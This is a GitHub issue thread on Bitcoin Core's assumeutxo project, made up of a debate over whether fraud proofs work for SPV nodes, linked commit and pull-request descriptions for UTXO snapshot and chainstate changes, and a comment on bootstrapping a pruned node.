Valid uses of this would be extraordinarily rare. Even 1 block per year would be far more frequent than is at all likely. The bandwidth needed is small, even for lightweight SPV nodes.

Just one rule-breaking transaction could already be catastrophic - like, minting 1 trillion coins out of thin air (it could be done through many ways, like, spending nonexistent UTXOs).

It's not about bargaining over bandwidth either. The point was that you can't know whether the alarm you received is a malicious false alarm. Even if you see a block failed to be downloaded, you can't convince others - "oh, must be a temporary network connectivity issue, maybe you should just try again?"

As long as the network of SPV servers is decentralized and honest nodes compose a significant fraction of those SPV servers

Just like what Satoshi's whitepaper had outlined:

If the majority were based on one-IP-address-one-vote, it could be subverted by anyone
able to allocate many IPs.

Miners are not naturally honest or selfless - it's on the contrary expected for them to behave greedily, selfishly and rationally. Miners are just incentivised to behave honestly under the constraints of consensus rules, or in other words, game theory.

Miners respect the consensus rules because they know other people will verify the blocks they mined according those rules - if they dare to let anything violating the rules sneak in, then no one will accept their hard-mined (costs expensive electricity in real world) block.

(To be honest, AFAIK, there are disagreements around this point - some people believe that only miners should verify the blocks, while some other people believe that it's not only miners but the economic majority should also always verify the blocks)

I think its very important that the Bitcoin community come to a consensus around bounadaries of what we consider "safe" as far as resource usage. What is the minimum resources of that "typical PC with a common internet connection"? If we need to support practical verifiability of the entire chain on below-average machines with below average resources, we need to limit the blockchain's grow much more than if we decided we only need to support practical verifiability of the entire chain by "average or better" machines etc.

Agreed.

@andronoob
Copy link

andronoob commented Dec 30, 2020

I see your point that successfully downloading a block proves that the alarm was a false one. However (let alone sybil attack) it still can't save the idea of fraud proofs, because even if you have failed to download a block, you are still not sure whether it's just some network connectivity issue - like the case of a stalled bittorrent which lacks seeders. In the end the alarm is still going to be ignored.

@fresheneesz
Copy link

Just one rule-breaking transaction could already be catastrophic

I think I know what you mean, but a rule-breaking transaction that inflates the supply of bitcoin is not relevant to fraud proofs. The rare event I was talking about in a bitcoin with fraud proofs would be where a majority of mining power tried to fork the blockchain in ways that would fool SPV nodes. If fraud proofs were in place, this would not only be incredibly difficult to pull of (as it would be without fraud proofs), but would also be unsuccessful. Without fraud proofs, such a scenario could succeed, and it could be catestrophic.

The point was that you can't know whether the alarm you received is a malicious false alarm.

That's simply not true. You download the accused block, you validate it, and then you know.

Even if you see a block failed to be downloaded, you can't convince others - "oh, must be a temporary network connectivity issue, maybe you should just try again?"

If a node can't download a block, then its invalid, full stop. You don't accept that a block is valid if you can't download it. Why would you? If someone can't download it, they should be very convinced that its not a valid block until shown otherwise.

In the end the alarm is still going to be ignored.

If you program the SPV node software to not ignore that, it won't be ignored. It would be a pretty stupid rule to ignore the fact that the data is not available.

@andronoob
Copy link

You can't know whether a block is downloadable (let alone its validity) before actually trying downloading it on your own. There are currently hundreds of thousands of historical blocks up till now, if some stranger tell you block XXXXXX can't be downloaded, what can you do? You must try downloading it on your own. Even if you can finally rule out all false alarms, you still have already paid expensive price.

Not accepting a block is also not the same situation to rejecting a block, the later requires known, clear evidence. For example, a full node won't accept a valid block either, until it's fully downloaded & verified.

If you decide to mark a chain (which you haven't fully downloaded it) as invalid simply because you failed to download some blocks of it, probably a temporary network connectivity issue (which can be either unintentional or intentional/malicious) can effectively shut down your full node, which is even worse than being tricked into downloading (almostly) the entire blockchain.

@fresheneesz
Copy link

fresheneesz commented Dec 30, 2020

@andronoob I disagree that your points support your proposition that fraud proofs aren't useful/workable. But I don't think this conversation is productive for this issue. If you want to keep discussing it, PM me on reddit.

@andronoob
Copy link

@fresheneesz I think it's more a theoretical problem rather than a practical one as well.

There's already a stackexchange question: https://bitcoin.stackexchange.com/questions/83422/is-the-idea-of-fraud-proofs-possible-in-reality

laanwj added a commit that referenced this issue Feb 16, 2021
1afc0e4 doc: remove potentially confusing ChainstateManager comment (James O'Beirne)
769a1ef test: Add tests with maleated snapshot data (Fabian Jahr)
4d8de04 tests: add snapshot activation test (James O'Beirne)
31d2252 tests: add deterministic chain generation unittest fixture (James O'Beirne)
6606a4f move-onlyish: break out CreateUTXOSnapshot from dumptxoutset (James O'Beirne)
ad949ba txdb: don't reset during in-memory cache resize (James O'Beirne)
f6e2da5 simplify ChainstateManager::SnapshotBlockhash() return semantics (James O'Beirne)
7a6c46b chainparams: add allowed assumeutxo values (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  This change proposes logic for activating UTXO snapshots, which is unused at the moment aside from an included unittest. There are a few moveonyish/refactoring commits to allow for halfway decent unittests.

  Basic structure is included for specifying and checking the assumeutxo hash values used to validate activated snapshots. Initially I had specified a few height/hash pairs for mainnet in this change, but because of the security-critical nature of those parameters, I figured it was better to leave their inclusion to a future PR that includes only that change - my intent being that reviewers will be more likely to verify those parameters firsthand in a dedicated PR.

  Aside from that and the snapshot activation logic, there are a few related changes:

  - ~~allow caching the `nChainTx` value in the CCoinsViewDB; this is set during snapshot activation. Because we don't necessarily have access to the full chain at the time of snapshot load, this value is communicated through the snapshot metadata and must be cached within the chainstate to survive restarts.~~
  - break out `CreateUTXOSnapshot()` from dumptxoutset. This is essentially a move-only change to allow the reuse of snapshot creation logic from within unittests.
  - ...and a few other misc. changes that are solely related to unittests.

  The move-onlyish commit is most easily reviewed with `--color-moved=zebra`.

ACKs for top commit:
  fjahr:
    Code review ACK 1afc0e4
  laanwj:
    Code review ACK 1afc0e4

Tree-SHA512: a4e4f0698f00a53ec298b5e8b7ef1c9fdf0185f95139d1b1f63cfdf6cbbd6d17b8c6e51bbf1de2e5f1a946bf49f8466232698ef55acce5a012c80b067da366ea
@ryanofsky
Copy link
Contributor

(from IRC)

<jamesob> Do we ever expect to support an index that actually requires sequential indexing? Jimpo's BaseIndex advertises that it will index sequentially, but at the moment none of the particular indexers require this. Furthermore, we will have BlockConnected events triggering indexing out of order once we start using background chainstates for assumeutxo

I don't think it affects when you're doing here, but I think of wallets as mini-indexes requiring sequential indexing. Wallets need to scan blocks in sequential order so the IsFromMe check in AddToWalletIfInvolvingMe) will work. Eventually after #15719 I think wallets and indexes should use the same interfaces::Chain sync / rescan / block connected / rewind interface and hooks and work more efficiently together

PhotoshiNakamoto added a commit to PhotonicBitcoin/pBTC-core that referenced this issue Dec 11, 2021
Bitcoin Core PR: bitcoin/bitcoin#17737

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin/bitcoin#15606
  Issue: bitcoin/bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  This changeset introduces `ChainstateManager`, which is responsible for creating and managing access to multiple chainstates. Until we allow chainstate creation from UTXO snapshots (next assumeutxo PR?) it's basically unnecessary, but it is a prerequisite for background IBD support.

  Changes are also made to the initialization process to make use of `g_chainman` and thus clear the way for multiple chainstates being loaded on startup.

  One immediate benefit of this change is that we no longer have the `g_blockman` global, but instead have the ChainstateManager inject a reference of its shared BlockManager into any chainstate it creates.

  Another immediate benefit is that uses of `ChainActive()` and `ChainstateActive()` are now covered by lock annotations. Because use of `g_chainman` is annotated to require cs_main, these two functions subsequently follow.

  Because of whitespace changes, this diff looks bigger than it is. E.g., bitcoin/bitcoin@4813167 is most easily reviewed with
  ```sh
  git show --color-moved=dimmed_zebra -w bitcoin/bitcoin@4813167
  ```
gades pushed a commit to cosanta/cosanta-core that referenced this issue Mar 11, 2022
* Backport Statoshi

This backports some of https://github.com/jlopp/statoshi.

Missing stuff: README.md and client name changes, segwit and fee estimation stats.

Fix RejectCodeToString

Fix copy-paste mistake s/InvalidBlockFound/InvalidChainFound/

* Merge bitcoin#16728: move-only: move coins statistics utils out of RPC

8a3b2eb move-only: move coins statistics utils out of RPC (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  In the short-term, this move-only commit will help with fuzzing (bitcoin#15606 (comment)). Later, these procedures will be used to compute statistics (particularly a content hash) for UTXO sets coming in from snapshots.

  Most easily reviewed with `git ... --color-moved=dimmed_zebra`. A nice follow-up would be adding unittests, which I'll do if nobody else gets around to it.

ACKs for top commit:
  MarcoFalke:
    ACK 8a3b2eb, checked --color-moved=dimmed-zebra

Tree-SHA512: a187d2f7590ad2450b8e8fa3d038c80a04fc3d903618c24222d7e3172250ce51badea35860c86101f2ba266eb4354e6efb8d7d508b353f29276e4665a1efdf74

* Fix 16728

* Modernize StatsdClient

- Reuse some functionality from netbase
- Switch from GetRand to FastRandomContext
- Drop `using namespace std` and add `// namespace statsd`

* Introduce PeriodicStats and make StatsdClient configurable via -stats<smth> (enabled/host/port/ns/period)

* Move/rename tip stats from CheckBlock to ConnectBlock

* Add new false positives to lint-format-strings.py

* Add snprintf in statsd_client to the list of known violations in lint-locale-dependence.sh

* Fix incorrect include guard

* Use bracket syntax includes

* Replace magic numbers with defaults

* Move connection stats calculation into its own function

And bail out early if stats are disabled

* assert in PeriodicStats

Co-authored-by: PastaPastaPasta <6443210+PastaPastaPasta@users.noreply.github.com>

Co-authored-by: MarcoFalke <falke.marco@gmail.com>
Co-authored-by: PastaPastaPasta <6443210+PastaPastaPasta@users.noreply.github.com>
fanquake added a commit that referenced this issue Jan 30, 2023
1d7935b test: add test for coins view flush behavior using Sync() (James O'Beirne)
2c3cbd6 test: add use of Sync() to coins tests (James O'Beirne)
6d8affc test: refactor: clarify the coins simulation (James O'Beirne)
79cedc3 coins: add Sync() method to allow flush without cacheCoins drop (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: #15606
  Issue: #15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  In certain circumstances, we may want to flush chainstate data to disk without
  emptying `cacheCoins`, which affects performance. UTXO snapshot
  activation is one such case, as we populate `cacheCoins` with the snapshot
  contents and want to persist immediately afterwards but also enter IBD.

  See also #15265, which makes the case that under normal operation a
  flush-without-erase doesn't necessarily add much benefit. I open this PR
  even in light of the previous discussion because (i) flush-without-erase
  almost certainly provides benefit in the case of snapshot activation (especially
  on spinning disk hardware) and (ii) this diff is fairly small and gives us convenient
  options for more granular cache management without changing existing policy.

  See also #15218.

ACKs for top commit:
  sipa:
    ACK 1d7935b
  achow101:
    ACK 1d7935b
  Sjors:
    tACK 1d7935b

Tree-SHA512: 897583963e98661767d2d09c9a22f6019da24125558cd88770bfe2d017d924f23a9075b729e4b1febdec5b0709a38e8fa1ef94d62aa88650556b06cb4826c845
sidhujag pushed a commit to syscoin/syscoin that referenced this issue Jan 30, 2023
1d7935b test: add test for coins view flush behavior using Sync() (James O'Beirne)
2c3cbd6 test: add use of Sync() to coins tests (James O'Beirne)
6d8affc test: refactor: clarify the coins simulation (James O'Beirne)
79cedc3 coins: add Sync() method to allow flush without cacheCoins drop (James O'Beirne)

Pull request description:

  This is part of the [assumeutxo project](https://github.com/bitcoin/bitcoin/projects/11):

  Parent PR: bitcoin#15606
  Issue: bitcoin#15605
  Specification: https://github.com/jamesob/assumeutxo-docs/tree/master/proposal

  ---

  In certain circumstances, we may want to flush chainstate data to disk without
  emptying `cacheCoins`, which affects performance. UTXO snapshot
  activation is one such case, as we populate `cacheCoins` with the snapshot
  contents and want to persist immediately afterwards but also enter IBD.

  See also bitcoin#15265, which makes the case that under normal operation a
  flush-without-erase doesn't necessarily add much benefit. I open this PR
  even in light of the previous discussion because (i) flush-without-erase
  almost certainly provides benefit in the case of snapshot activation (especially
  on spinning disk hardware) and (ii) this diff is fairly small and gives us convenient
  options for more granular cache management without changing existing policy.

  See also bitcoin#15218.

ACKs for top commit:
  sipa:
    ACK 1d7935b
  achow101:
    ACK 1d7935b
  Sjors:
    tACK 1d7935b

Tree-SHA512: 897583963e98661767d2d09c9a22f6019da24125558cd88770bfe2d017d924f23a9075b729e4b1febdec5b0709a38e8fa1ef94d62aa88650556b06cb4826c845
@rebroad
Copy link
Contributor

rebroad commented May 12, 2023

Regarding bootstrapping a pruned node from a full-node, the way I'd do it is to bitcoin-cli the running node to stop it accepting any more blocks or transactions, copy --reflink=always the block index and chainstate to a new bitcoind instance, bitcoin-cli the running node to resume accepting blocks and transactions, modify the new instance to use new ports, and enable pruning, and run it, wait for it to prune the block index, and then exit, and voila, I have a ready to copy bitcoind instance that I can install elsewhere.

I'm not really sure it needs to be much more complicated than this, although ideally a way to do it without suspending activity on the main instance would be nice, but hardly worth it given the relatively little downtime the above method causes.

@bitcoin bitcoin locked and limited conversation to collaborators May 11, 2024
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
Archived in project
Development

No branches or pull requests

15 participants